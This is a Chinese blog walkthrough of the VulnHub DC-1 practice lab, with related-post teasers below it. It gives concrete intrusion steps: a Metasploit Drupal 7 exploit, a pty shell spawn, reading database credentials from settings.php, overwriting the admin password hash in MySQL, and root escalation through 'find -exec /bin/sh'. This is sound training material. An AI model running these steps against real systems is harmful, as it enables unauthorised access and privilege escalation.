DC-1通关教程

已于 2024-09-27 08:57:04 修改
阅读量811 收藏 17
点赞数 7
文章标签: c++
于 2024-09-20 18:22:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83876878/article/details/142391947
版权

DC-1

一.创建环境

1.在虚拟机里创建一个dc-1靶场 dc-1的主要作用是获得渗透测试领域的经验

2、下载靶场环境

    靶场下载地址:

DC: 1 ~ VulnHub

二.渗透靶场

    本环境重在在于如下两个知识点

    Drupal 7  漏洞利用

find  提权

1、目标:

目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2、信息收集:寻找靶机真实IP

nmap -sP 1 XXX.XXX.XXX.XXX /24

扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。

本质上是Ping扫描,能Ping通有回包,就判定主机在线。

3、信息收集:探端口及服务

nmap -A -p- -v 192.168.52.129

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息

发现开放了22端口,开放了ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务

访问web站点

4.发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7

5.利用MSF渗透

典型的drupal,启动Metersploit  MSF存在drupal模块,尝试使用msf渗透

1.MSF简单命令介绍

msfconsole              进入MSF控制台

search                     搜索相应模块

use                对应模块

show options         查看信息

set RHOST              远程主机ip

run                攻击

3.进入MSF控制台搜索drupal模块

进入MSF控制台msfdb run

搜索drupal模块search drupal

6.选择模块进行测试

用2018的测试

  1. 设置靶机IP运行msf

8.执行whoami

发现是www-data权限

进入home目录,发现flag4.txt文件,提示需要提升权限

9.使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

显示了当前路径

10.发现flag1文件

    查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

11.发现flag2

    Drupal的默认配置文件为

/var/www/sites/default/settings.php

  查看文件内容

cat /var/www/sites/default/settings.php

    发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件

12.我们先进入数据库查看

'username' => 'dbuser',

'password' => 'R0ck3t',

mysql -u dbuser -p

    查看数据库,切换到drupaldb数据库

13.查看查找默认的Drupal user 表

select * from users;

    发现admin信息

解决方法:置换drupal密码

14.进入www目录

quit;

站点路径下执行

php scripts/password-hash.sh 123新密码
 

 

15.然后在进入数据库中把密码字段进行替换
 进入mysql,输入密码,切换到drupaldb数据库
 

mysql -u dbuser -pR0ck3t
 

use drupaldb
 

将pass字段进行替换
 

update users set
 

pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";
 

然后再在pass=“引号前打上空格和vtt2w“前打上空格后在输入一次
 

 

16..登录站点
 

    访问站点
 

    进行登录,密码是之前我们自己替换的,账号是admin
 

admin
 

123
 

成功登录然后在浏览器中输入自己的测试ip192.168.52.129然后在下图中查找flag3然后查看信息
 

 

17.使用命令查看 suid 权限的可执行二进制程序
 

 

find / -perm -4000 2>/dev/null
 

发现find命令
 

 

 

 

18.使用命令测试,发现为root权限
 

 

touch 123
 

ls
 

find / -name 123 -exec "whoami" \;
 

 

19.发现最后的flag文件
 

 

    我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。
 

find ./ -name 666 -exec "/bin/sh" \;  
 

whoami
 

ls
 

cd /root
 

ls
 

    查看cat thefinalflag.txt文件
 

cat thefinalflag.txt
 

 

 

看到上图也就代表基本完成

                

        

        

    

  


    

      

        

            

              
                
                  財多亿
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
DC-4通关教程

				
			

			

				

					m0_74402888的博客
				

				

					04-24
					
					2069
					
				

			

		

		

			
				
6默认的shell:这个字段指定了用户的默认shell,即用户登录后用来执行命令的程序。在Linux系统中,/etc/passwd是一个重要的系统用户配置文件,用于存储系统中所有用户的基本信息。在Linux中,/usr/bin目录主要用于存放用户可执行的二进制文件,即用户可以直接执行的程序。火狐浏览器打开网页,用自带的扩展“wappalyzer”查看页面的一些信息,cms,js版本,和php信息,发现没有可用的信息,5家目录:这个字段指定了用户的家目录,即用户登录后所处的目录。用户可以属于多个组。

			
		

	



                

              
                



	

		

			

				
					
DC-5通关教程

				
			

			

				

					m0_74402888的博客
				

				

					04-25
					
					1054
					
				

			

		

		

			
				
具体来说,这个命令在文件系统的根目录(/)开始,查找所有设置了setuid位(set user ID on execution)的文件,并将这些文件的路径打印出来。可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞。编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容。刷新后页面内容会发生变化,可能存在文件包涵,这个是一个突破口。

			
		

	



                


  
              

                


	

		

			

				
					
DC-8通关教程

				
			

			

				

					m0_74402888的博客
				

				

					04-26
					
					1154
					
				

			

		

		

			
				
SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险。nid=1" --level=5 --risk=3 --batch --current-db //爆破当前数据库。测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码。sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上。SUID是给命令赋予root用户的权限,权限在命令上。

			
		

	





	

		

			

				
					
DC-2通关教程

				
			

			

				

					2401_83876878的博客
				

				

					09-26
					
					991
					
				

			

		

		

			
				
DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。5. 发现不能访问,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt。wpscan --url http://dc-2 --enumerate u 枚举用户。登录后台之后,我们看到flag2,我用的是jerry的账号。

			
		

	



		

			
		



	

		

			

				
					
Dc-2通关教程

					
最新发布

				
			

			

				

					2402_84645634的博客
				

				

					09-29
					
					618
					
				

			

		

		

			
				
DC-2从环境搭建到通关教程

			
		

	





	

		

			

				
					
DC-3通关教程

				
			

			

				

					m0_74402888的博客
				

				

					04-23
					
					824
					
				

			

		

		

			
				
利用John(john 设置为使用特定的哈希格式进行破解,有多种方法可以做到对哈希类型进行识别)工具,对该密码进行爆破拆解。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。joomscan是一款开源的且针对joomla的扫描器,kali可以用命令。searchsploit是一款kali自带的搜索漏洞信息的模块。

			
		

	





	

		

			

				
					
DC系列靶机1通关教程

				
			

			

				

					weixin_58954236的博客
				

				

					08-04
					
					223
					
				

			

		

		

			
				
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。Meterpreter的功能强大,灵活性高,提供了很多有用的命令和功能,包括:进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。

			
		

	





	

		

			

				
					
DC-6通关教程

				
			

			

				

					m0_74402888的博客
				

				

					04-25
					
					916
					
				

			

		

		

			
				
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。

			
		

	





	

		

			

				
					
DC-7通关教程

				
			

			

				

					m0_74402888的博客
				

				

					04-26
					
					877
					
				

			

		

		

			
				
在Linux中,backups.sh 通常是一个脚本文件的名称,用于执行备份任务。这个脚本可能包含一系列的命令,用于将文件、目录或整个系统备份到某个位置,可能是本地磁盘、网络共享、云存储等。root用户及其组用户(www-data)可以写入读取执行·,但其他用户没有写入的权限,这里可以作为提权的一个突破口。DC-7 引入了一些“新”概念,但我会让你自己去弄清楚它们是什么。发现了个drush命令,这个是drupal专属的一个操作系统命令,参考。vm  编辑--查看虚拟网络编辑器,看到靶机的网段。

			
		

	





	

		

			

				
					
Vulnhub靶机:DC-8渗透详细过程

				
			

			

				

					IerkeU的博客
				

				

					03-28
					
					3040
					
				

			

		

		

			
				
DC-8
前情提要
靶场地址:https://www.vulnhub.com/entry/dc-8,367/
DC-8是一个中级的靶场,需要具备以下前置知识:

基础的Linux命令及操作
基础的渗透测试工具使用(Kali / Parrot下的工具)

翻译一下官方给出的一些信息:
这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux  服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验

			
		

	





	

		

			

				
					
WEB-CTF通关教程

				
			

			

				

					m0_50098640的博客
				

				

					08-01
					
					584
					
				

			

		

		

			
				
信息泄露的第二关
进去页面如下

查看源代码发现后缀为.sql的文件。

看见这个文件思路就是把这个文件下载下来查看敏感数据。尝试在链接后直接加文件名,发现直接下载了我们的文件。

使用记事本打开文件,得到flag值。

暴力破解第二关
打开页面提示如下,

点击地址传送门得到如下链接

将链接的UID使用在线base64解码得到的结果如下

看到这明白了解这个题的思路,抓包爆破UID值。从T_1到T_5000,思路有了,可是具体爆破的时候不知道怎么爆破,等知道怎么解决这个问题了之后再来更。
xss第二关


			
		

	





	

		

			

				
					
【xss-labs靶场实战通关教程

				
			

			

				

					AuroraMiraitowa的博客
				

				

					03-09
					
					1125
					
				

			

		

		

			
				
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。

			
		

	





	

		

			

				
					
【智能交互】OPPO接入小布语音技能通关教程:个人开发者实现接口调用

				
			

			

				

					C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
				

				

					07-19
					
					3133
					
				

			

		

		

			
				
适用人群:本教程适合大赛接入小布语音技能的同学以及初次使用小布助手的开发者本篇文章是博主弄了多次测试才勉强弄明白的,OPPO的开发文档和没有没啥区别很多人会问:“为啥有更成熟的其他语音技能平台放着不用?答:“因为我在参加的比赛是由oppo主办方举办的,若要想进决赛,必须要接入OPPO开放平台”猜想测试部分和实际操作部分,请根据你的需要进行跳过选择。

			
		

	





	

		

			

				
					
OVerTheWire:NATAS通关0-20

				
			

			

				

					friutUncil的博客
				

				

					09-30
					
					1099
					
				

			

		

		

			
				
LV0

natas将是一些服务端的安全基础知识,ok,试一下吧
You can find the password for the next level on this page.
打开就是这句话,在此页能找到密码,但是找不到呀,那就看下源码吧 F12
再注释里找到密码
The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto

LV...

			
		

	





	

		

			

				
					
C++】拆分详解 - string类

				
			

			

				

					bubble_shadow的博客
				

				

					09-23
					
					1033
					
				

			

		

		

			
				
string类的文档介绍注:此处及下文部分,蓝色下划线标识文本均为超链接,点击即可跳转字符串是表示字符序列的类标准的字符串类提供了对此类对象的支持,其接口类似于标准字符容器的接口,但添加了专门用于操作单字节字符字符串的设计特性。string类是使用char(即作为它的字符类型,使用它的默认char_traits和分配器类型(关于模板的更多信息,请参阅basic_string)。

			
		

	





	

		

			

				
					
pyqt瀑布流布局

				
			

			

				

					weixin_54217201的博客
				

				

					09-21
					
					504
					
				

			

		

		

			
				
最近研究瀑布流布局,发现都是收费的,所以只能自己写算法写布局。所以啥都不说直接上代码。

			
		

	





	

		

			

				
					
189. 轮转数组(C++

				
			

			

				

					weixin_45813121的博客
				

				

					09-25
					
					451
					
				

			

		

		

			
				
给定一个整数数组nums,将数组中的元素向右轮转k个位置,其中k是非负数。

			
		

	





	

		

			

				
					
c++ 使用 Graham 扫描的凸包(Convex Hull using Graham Scan)

				
			

			

				

					csdn_aspnet的专栏
				

				

					09-26
					
					1086
					
				

			

		

		

			
				
对于剩余的点,我们跟踪最近的三个点,并找到它们形成的角度。如果这些点的方向(按相同顺序考虑它们)不是逆时针的,我们丢弃 c,否则我们保留它。因此,第六步逐个处理点需要 O(n) 时间,假设堆栈操作需要 O(1) 时间。总体复杂度为 O(n) + O(nLogn) + O(n) + O(n),即 O(nLogn)。在每个步骤中,算法都会检查添加到凸包中的最后两个点是否形成右转。格雷厄姆扫描算法是一种简单而有效的算法,用于计算一组点的凸包。凸包用于各种计算几何算法,例如查找最近的点对和计算一组点的直径。

			
		

	





	

		

			

				
					
设置无标题 android

				
			

			

				

					05-02
				

			

		

		

			
				
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法:

1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。

2. 使用自定义的主题,可以在样式表中添加以下代码: 

   
<style name="AppTheme" parent="Theme.AppCompat.NoActionBar">
    <!-- ...其他样式... -->
</style>
这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。

3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。

以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值